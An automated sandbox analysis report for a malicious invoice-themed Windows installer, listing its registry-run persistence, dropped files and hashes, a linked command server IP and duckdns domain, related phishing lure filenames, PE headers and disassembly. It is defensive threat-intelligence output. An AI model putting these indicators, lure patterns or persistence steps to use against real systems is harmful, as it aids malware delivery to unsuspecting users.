Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:32:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kyvrnrwl C:\Users\user\AppData\Roaming\dihsw\chmac.exe
15:32:22	API Interceptor	959x Sleep call for process: G2M8C76V_INV0ICE_RECEIPT.exe modified
15:32:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kyvrnrwl C:\Users\user\AppData\Roaming\dihsw\chmac.exe
15:32:27	API Interceptor	2x Sleep call for process: chmac.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
194.5.98.28	Z82M395C8INV0ICEPAYMENTC0PY.exe	Get hash	malicious	Browse
	039846H0INVOICERECEIPT.exe	Get hash	malicious	Browse
	Scan document_49.exe	Get hash	malicious	Browse
	INrZg0O5sW.exe	Get hash	malicious	Browse
	U5lYXISuny.exe	Get hash	malicious	Browse
	OUTSTANDING INVOICE.pdf.exe	Get hash	malicious	Browse
	Folha de dados de cota#U00e7#U00e3o para nossa empresa doc.exe	Get hash	malicious	Browse
	Folha de dados de cota#U00e7#U00e3o para nossa empresa doc.exe	Get hash	malicious	Browse
	27RFQ.exe	Get hash	malicious	Browse
	32RFQ.exe	Get hash	malicious	Browse
	3Agent Registration Update on PAGA.xlsx.exe	Get hash	malicious	Browse
	20New Price list Update On DSTV&GOTV For Easter Bonus.xlsx.exe	Get hash	malicious	Browse
	46Recently Updated On Our Pricing And Commissions On Paga.xlsx.exe	Get hash	malicious	Browse
	9PAGA Commission Analysis On Bill Payment And Airtime for the month of march 2019.pdf.exe	Get hash	malicious	Browse
	31ACTIVATION TEMPLATE.xlsx.exe	Get hash	malicious	Browse
	3Paga Agent Bonus Activation For The Month Of March 2019.pdf.exe	Get hash	malicious	Browse
	19Important Verification Information Update On QT Paypoint.xlsx.exe	Get hash	malicious	Browse
	35Agent price update as at 21st of March 2019.xlsx.exe	Get hash	malicious	Browse
	54AGENT GUIDE DOCUMENT.pdf.exe	Get hash	malicious	Browse
	3OFFER LETTER.pdf.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
boyhome5100.duckdns.org	Z82M395C8INV0ICEPAYMENTC0PY.exe	Get hash	malicious	Browse	194.5.98.28

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	async.vbs	Get hash	malicious	Browse	194.5.98.253
	Z82M395C8INV0ICEPAYMENTC0PY.exe	Get hash	malicious	Browse	194.5.98.28
	039846H0INVOICERECEIPT.exe	Get hash	malicious	Browse	194.5.98.28
	SecuriteInfo.com.Program.Unwanted.3981.14233.exe	Get hash	malicious	Browse	194.5.98.18
	INVOICE 1842.xlsm	Get hash	malicious	Browse	194.5.98.18
	DHL8395278940.exe	Get hash	malicious	Browse	194.5.98.11
	Signed contract.exe	Get hash	malicious	Browse	194.5.98.12
	2674d727df5ea8bebb425935be9017e9.exe	Get hash	malicious	Browse	194.5.98.20
	GeU9eHNGK4.exe	Get hash	malicious	Browse	194.5.98.107
	TtbGUPFHJ1.exe	Get hash	malicious	Browse	194.5.98.107
	H2J1M7D65PAYMENTRECEIPT.vbs	Get hash	malicious	Browse	194.5.98.31
	Y81N365C4_PAYMENT_RECEIPT.vbs	Get hash	malicious	Browse	194.5.98.31
	Request for Quotation (NEW PRICE LIST 2022).exe	Get hash	malicious	Browse	194.5.98.22
	Bank account information.exe	Get hash	malicious	Browse	194.5.98.12
	#U3010#U6566#U8c6a#U3011#U7535#U5b50#U53d1#U7968(#U53d1#U7968#U53f7DHL31122021.exe	Get hash	malicious	Browse	194.5.98.11
	neworder-enquiry (2).exe	Get hash	malicious	Browse	194.5.98.46
	#RFQ ORDER484425083-NJQ.exe	Get hash	malicious	Browse	194.5.98.120
	shipment.exe	Get hash	malicious	Browse	194.5.97.153
	Commercial invoice and Packing list.exe	Get hash	malicious	Browse	194.5.98.12
	Purchase Order 100-211 for BT & VM.exe	Get hash	malicious	Browse	194.5.98.139

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\chmac.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Temp\56mc2ilzkdt85ppfm Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	278527
Entropy (8bit):	7.984440804169609
Encrypted:	false
SSDEEP:	6144:ANMYeemSX268bMvy0lOGYLjTDNe4bKtB5u85S1wJLYoAlwYJuDNW:AqYeyX6Yq0lPYXNdb0Hw1wJLYoAlLgW
MD5:	E2674E39313EB905BEDB38EE4A90EB82
SHA1:	7EC20D0AD4E70C7621B7D0D836CA7C22029B8A9E
SHA-256:	91CBC859051888ECD50E3765A1A0AE9280DBD540A32A272D6D153F969CEA606D
SHA-512:	FA36A87ED16623BC62B76663F2DFAB3097DA69107CB091BD3BD4C677415F09E5CAF329F06FB566CF8A29CBDE7E50CCACDDFBE44BC125532BF0D9F6AF9D0BC52B
Malicious:	false
Reputation:	low
Preview:	...np.y6k.x..@.........M...v...,M.6.'..X..._...1v.,l.....8.Z6..H.2B.?.K..<.Lp.,h.].PYEG.t.BlU...Z.7.F....%.#..z..Z.3............`P...?.R)......0.....$\|.tW`../.ugo..<.c]}D.nT)...0&.i..............v. {...g...S.X2;v....r`.7...P-.3Rq8.......S..?. ..p.y...x.vc.........\|.M.}..o,..,M.6.'L.X..._[..1v.,l.\.. .VZ.{\|....t...B.?.H.....M.&M_F..I^Q.{..#....k.r0...G!...Ba.3......6.D=...B.lX...8.Ob.A...q=....Cw....Z...."fR"..l..V...@....;qe.P2..`...B.!..s..L..Q?`..R...Ki.SH..=D$..r....2a}M...X......S..v...p.yg,.x?.@........\|.M...v...,..6....;.._t..1vs,l.... I.Z..{\|.o..P....?Fa9wj.M....F...^QI{...a...X.r....GG..TBD...k(...P.D=...bR.X..L8........q=..<.C...P.]...CA?R"U.l..d.......;qe.P2..b..dB.!..s.......?`..R...Ki.SB....$..r....2a}M...X......S..?. ..p.y.k.x?2@........\|.M...v...,M.6.'..X..._...1v.,l.... ..Z..{\|.o..P...B.?...U...M.&..F.zI^Q.{..#....X.r....GG..TBa.3......6.D=...bb.X...8........q=....Cw....Z...."fR"..l.j...@....*;qe.P2..`...B.!..s.......?`..R...Ki.SB....$.

C:\Users\user\AppData\Local\Temp\nfjvhlc Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	7448
Entropy (8bit):	6.084978183064926
Encrypted:	false
SSDEEP:	192:efAApVIRgy4M0Ag13vj/O7s7Pb/T8MEAGLVrW1nU8sj:kqb0bF/NPbAMKLVrMnUv
MD5:	812162B475D941A12A193D8C085597E6
SHA1:	9B4B7CD34860F8FA19B0B5154DBB7F69CFC99489
SHA-256:	C89928AC7C6B93AB283B1197CA645AF22DC77FBFA5E066EDEEAE3402A952ED47
SHA-512:	BFAB4487C5434108FC063A6FCE997543B720F179674C32366910A25DB366FC41179A5492719288C2ABBB2677C510FFD41EDE53B98ED2F44155B8DA50FBE33722
Malicious:	false
Reputation:	low
Preview:	;,....i...........T....4.T....<....]................g...<......,..8......g...<<.....$..0......g...<1.....\..(......g...<V.....T..`... .....T!!..k..4..@i..< .[..<...i.<i..g S.2....i.<!..g b.........@...<..... ..)....,...$...\...T...4...<......i..............,.i.......!..<....].. ..... ..)i....i.....i?.b...i....T.....i..i.....i..i.i..i.S...i.S ...i..i..i....i..i..i?.b.....^.<."..<."..b.....5.<."..<."..b....y.<."..<."..b...i.....T....<]......g.,.........i..^..i.....i......@<.....T..i..k....[....,...8g.<k...S3....,...8."....T.g..,....5.<#....<&........g.<....<...................]......i..i?.b ..i.....T....<]......g.T.........i..^..i.....i......@<. ...T.j...i..k....[....T...`i..k...S3....T...`i..k...#3...T...`i...[....2!...T...`g.<k...S3"...T...`......T.g..T....^.<>....<A............i.<i....................<...................]......i..i?.b...i....]......g.@.........i..^..i.....i......@<.!...T..i..k....[....@...<i..k...S3....@...<."....T.g..@...y.<.....<...........

C:\Users\user\AppData\Local\Temp\nsiCC1.tmp Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	317856
Entropy (8bit):	7.76643048605343
Encrypted:	false
SSDEEP:	6144:2jCLNMYeemSX268bMvy0lOGYLjTDNe4bKtB5u85S1wJLYoAlwYJuDN:2eqYeyX6Yq0lPYXNdb0Hw1wJLYoAlLg
MD5:	C2D44B063B4B0AABF482FFB2E1074145
SHA1:	F5EFA683BD7E7FCDF848C26F8E8A81D9DDA9CFE6
SHA-256:	0994AF1254D390C551AD60759AF35F2267CB7324182C2087772D51D89DB9C004
SHA-512:	BB831F963B4213E5B23403141261BE8C8C68EBEFE087EE66B4C5783A343FE93DB8A081CCC7AEF6998861371D51FFE4B9FFEB39A3AAC53FAC8C5C9D14F94FC795
Malicious:	false
Reputation:	low
Preview:	yj......,...................a....P.......i......aj..........................................................................................................................................................................................................................................J...................j........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsiCC2.tmp\esrskf.dll Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.7711135978980614
Encrypted:	false
SSDEEP:	24:e31GSNNN0teIAJdax/+YZVy0NVxagHCueecv8hueeYoNXs+f3SlLRQ0K7ABPnRug:CnaI9ro3ngnFbfGFN1RuqSR
MD5:	CA6B2E72403972AE585025A81040FC44
SHA1:	BDA160D06EE5611B6CFE53F048CC00526941A1D4
SHA-256:	E0932A5438FFEE964EF9DEB10C5C5F187B12B319894552BA062A36E93EABBBF8
SHA-512:	48283C382D8C95DC96E193EAE541F6E86FFA43D107D0F739F1FFEA779364EFC0562A094C167F65ADCFD97B37BA6A31F561E237E92601F908AD7AAC87FF56B2ED
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L....0.a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...B........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq5FC3.tmp Download File
Process:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
File Type:	data
Category:	dropped
Size (bytes):	317856
Entropy (8bit):	7.76643048605343
Encrypted:	false
SSDEEP:	6144:2jCLNMYeemSX268bMvy0lOGYLjTDNe4bKtB5u85S1wJLYoAlwYJuDN:2eqYeyX6Yq0lPYXNdb0Hw1wJLYoAlLg
MD5:	C2D44B063B4B0AABF482FFB2E1074145
SHA1:	F5EFA683BD7E7FCDF848C26F8E8A81D9DDA9CFE6
SHA-256:	0994AF1254D390C551AD60759AF35F2267CB7324182C2087772D51D89DB9C004
SHA-512:	BB831F963B4213E5B23403141261BE8C8C68EBEFE087EE66B4C5783A343FE93DB8A081CCC7AEF6998861371D51FFE4B9FFEB39A3AAC53FAC8C5C9D14F94FC795
Malicious:	false
Reputation:	low
Preview:	yj......,...................a....P.......i......aj..........................................................................................................................................................................................................................................J...................j........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsq5FC4.tmp\esrskf.dll Download File
Process:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.7711135978980614
Encrypted:	false
SSDEEP:	24:e31GSNNN0teIAJdax/+YZVy0NVxagHCueecv8hueeYoNXs+f3SlLRQ0K7ABPnRug:CnaI9ro3ngnFbfGFN1RuqSR
MD5:	CA6B2E72403972AE585025A81040FC44
SHA1:	BDA160D06EE5611B6CFE53F048CC00526941A1D4
SHA-256:	E0932A5438FFEE964EF9DEB10C5C5F187B12B319894552BA062A36E93EABBBF8
SHA-512:	48283C382D8C95DC96E193EAE541F6E86FFA43D107D0F739F1FFEA779364EFC0562A094C167F65ADCFD97B37BA6A31F561E237E92601F908AD7AAC87FF56B2ED
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L....0.a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...B........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx3DC4.tmp Download File
Process:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
File Type:	data
Category:	dropped
Size (bytes):	317856
Entropy (8bit):	7.76643048605343
Encrypted:	false
SSDEEP:	6144:2jCLNMYeemSX268bMvy0lOGYLjTDNe4bKtB5u85S1wJLYoAlwYJuDN:2eqYeyX6Yq0lPYXNdb0Hw1wJLYoAlLg
MD5:	C2D44B063B4B0AABF482FFB2E1074145
SHA1:	F5EFA683BD7E7FCDF848C26F8E8A81D9DDA9CFE6
SHA-256:	0994AF1254D390C551AD60759AF35F2267CB7324182C2087772D51D89DB9C004
SHA-512:	BB831F963B4213E5B23403141261BE8C8C68EBEFE087EE66B4C5783A343FE93DB8A081CCC7AEF6998861371D51FFE4B9FFEB39A3AAC53FAC8C5C9D14F94FC795
Malicious:	false
Reputation:	low
Preview:	yj......,...................a....P.......i......aj..........................................................................................................................................................................................................................................J...................j........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsx3DC5.tmp\esrskf.dll Download File
Process:	C:\Users\user\AppData\Roaming\dihsw\chmac.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.7711135978980614
Encrypted:	false
SSDEEP:	24:e31GSNNN0teIAJdax/+YZVy0NVxagHCueecv8hueeYoNXs+f3SlLRQ0K7ABPnRug:CnaI9ro3ngnFbfGFN1RuqSR
MD5:	CA6B2E72403972AE585025A81040FC44
SHA1:	BDA160D06EE5611B6CFE53F048CC00526941A1D4
SHA-256:	E0932A5438FFEE964EF9DEB10C5C5F187B12B319894552BA062A36E93EABBBF8
SHA-512:	48283C382D8C95DC96E193EAE541F6E86FFA43D107D0F739F1FFEA779364EFC0562A094C167F65ADCFD97B37BA6A31F561E237E92601F908AD7AAC87FF56B2ED
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........z-...C]..C]..C]Z.M]..C].}B\..C]..B]..C].nG\..C].nC\..C].n.]..C].nA\..C]Rich..C]........................PE..L....0.a...........!......................... ...............................P............@.......................... ..H.... .......0.......................@..<.................................................... ...............................text...B........................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..<....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	7.089541637477408
Encrypted:	false
SSDEEP:	3:XrURGizD7cnRNGbgCFKRNX/pBK0jCV83ne+VdWPiKgmR7kkmefoeLBizbCuVkqYM:X4LDAnybgCFcps0OafmCYDlizZr/i/Oh
MD5:	9E7D0351E4DF94A9B0BADCEB6A9DB963
SHA1:	76C6A69B1C31CEA2014D1FD1E222A3DD1E433005
SHA-256:	AAFC7B40C5FE680A2BB549C3B90AABAAC63163F74FFFC0B00277C6BBFF88B757
SHA-512:	93CCF7E046A3C403ECF8BC4F1A8850BA0180FE18926C98B297C5214EB77BC212C8FBCC58412D0307840CF2715B63BE68BACDA95AA98E82835C5C53F17EF38511
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....~f.G0^..;....W2.=...K.~.L..&f...p............:7rH}..../H......L...?...A.K...J.=8x!....+.2e'..E?.G......[.&

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	International EBCDIC text, with no line terminators, with overstriking
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:JX98:o
MD5:	96A85767F76F3E5FC753A622A56C5315
SHA1:	67832A8FDABC53BB4AF9DFEB37705D62A32559A5
SHA-256:	8AE24E6F0625954103BC1DE425F96A077410B995891E73E706600B3F3F7B23AC
SHA-512:	E3161717A96BE7C5DC13440E44DF7F4791C53496D20939026689BE160AA04EFF916C08E3F91363158FCC874AD527A18D046A68E3AD2F4FE8DEC9604A155F38EE
Malicious:	true
Preview:	..`....H

C:\Users\user\AppData\Roaming\dihsw\chmac.exe Download File
Process:	C:\Users\user\Desktop\G2M8C76V_INV0ICE_RECEIPT.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	663115
Entropy (8bit):	5.508570188450402
Encrypted:	false
SSDEEP:	6144:lwq9sUW6UzgZb6uxaKHEMiYKpgss9N2zy:6UZYgxc5NYKCr7
MD5:	D272E884F59FF9D7921619F88766709D
SHA1:	B9013DCFFC28E174C1CB7D81FD46B6463B4FF579
SHA-256:	94A00E5D13EEBC1A99DD48E2D9F9CB48935C424C6BD58AB9F6D78FF0CAA36506
SHA-512:	EB8A351EB547A359F246B6E82B4794AEF31E2A350043116965E636A7A69583621C1EE2A5381079A1815A7489BFADC2FC3962AE74CBDF523A4F6E6E7E2379D9C2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.......p....@..........................p...............................................s.......................................................................................p...............................text...vY.......Z.................. ..`.rdata.......p.......^..............@..@.data................p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	5.508570188450402
TrID:	Win32 Executable (generic) a (10002005/4) 92.16% NSIS - Nullsoft Scriptable Install System (846627/2) 7.80% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	G2M8C76V_INV0ICE_RECEIPT.exe
File size:	663115
MD5:	d272e884f59ff9d7921619f88766709d
SHA1:	b9013dcffc28e174c1cb7d81fd46b6463b4ff579
SHA256:	94a00e5d13eebc1a99dd48e2d9f9cb48935c424c6bd58ab9f6d78ff0caa36506
SHA512:	eb8a351eb547a359f246b6e82b4794aef31e2a350043116965e636a7a69583621c1ee2a5381079a1815a7489bfadc2fc3962ae74cbdf523a4f6e6e7e2379d9c2
SSDEEP:	6144:lwq9sUW6UzgZb6uxaKHEMiYKpgss9N2zy:6UZYgxc5NYKCr7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

File Icon


Icon Hash:	d8c8d0d0f0ccd4d0

Static PE Info

General
Entrypoint:	0x403225
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	099c0646ea7282d232219f8807883be0

Entrypoint Preview

Instruction
sub esp, 00000180h
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409128h
xor esi, esi
mov byte ptr [esp+14h], 00000020h
call dword ptr [00407030h]
push 00008001h
call dword ptr [004070B4h]
push ebx
call dword ptr [0040727Ch]
push 00000008h
mov dword ptr [00423F58h], eax
call 00007F38E8C8C460h
mov dword ptr [00423EA4h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 00000160h
push eax
push ebx
push 0041F450h
call dword ptr [00407158h]
push 004091B0h
push 004236A0h
call 00007F38E8C8C117h
call dword ptr [004070B0h]
mov edi, 00429000h
push eax
push edi
call 00007F38E8C8C105h
push ebx
call dword ptr [0040710Ch]
cmp byte ptr [00429000h], 00000022h
mov dword ptr [00423EA0h], eax
mov eax, edi
jne 00007F38E8C8992Ch
mov byte ptr [esp+14h], 00000022h
mov eax, 00429001h
push dword ptr [esp+14h]
push eax
call 00007F38E8C8BBF8h
push eax
call dword ptr [0040721Ch]
mov dword ptr [esp+1Ch], eax
jmp 00007F38E8C89985h
cmp cl, 00000020h
jne 00007F38E8C89928h
inc eax
cmp byte ptr [eax], 00000020h
je 00007F38E8C8991Ch
cmp byte ptr [eax], 00000022h
mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x73a4	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x5ac80	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x28c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5976	0x5a00	False	0.668619791667	data	6.46680044621	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1190	0x1200	False	0.444878472222	data	5.17796812871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1af98	0x400	False	0.55078125	data	4.68983486809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x24000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x5ac80	0x5ae00	False	0.0282652381362	data	2.14570825877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c280	0x42028	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x6e2a8	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x7ead0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x82cf8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x852a0	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x86348	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x867b0	0x100	data	English	United States
RT_DIALOG	0x868b0	0x11c	data	English	United States
RT_DIALOG	0x869d0	0x60	data	English	United States
RT_GROUP_ICON	0x86a30	0x5a	data	English	United States
RT_MANIFEST	0x86a90	0x1eb	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
